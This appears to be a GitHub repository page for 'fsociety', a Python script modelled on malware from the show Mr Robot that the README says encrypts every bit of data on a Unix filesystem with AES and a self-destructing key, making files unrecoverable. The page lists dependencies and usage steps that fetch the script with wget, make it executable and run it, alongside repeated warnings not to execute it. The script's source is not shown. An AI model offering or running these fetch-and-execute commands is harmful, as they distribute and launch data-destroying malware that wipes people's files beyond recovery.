Skip to content

WARNING: do not actually execute this. You will not be able to recover your files

Notifications You must be signed in to change notification settings

martinpham97/fsociety

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

79 Commits
 
 
 
 
 
 
 
 

Repository files navigation

fsociety

WARNING: do not actually execute this. You will not be able to recover the files.

This is intended to encrypt every bit of data in a unix filesystem using 256-bit AES with a self-destructing, randomly generated key.

The fuxsocy.py script is based on Darlene's malware shown in Mr Robot

alt-text

Dependencies:

  • python
  • pycrypto
sudo apt install python python-pip
sudo pip install pycrypto

Usage:

wget https://raw.githubusercontent.com/joekendal/fsociety/master/fuxsocy.py
sudo chmod +x fuxsocy.py
./fuxsocy.py

About

WARNING: do not actually execute this. You will not be able to recover your files

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Languages

  • Python 100.0%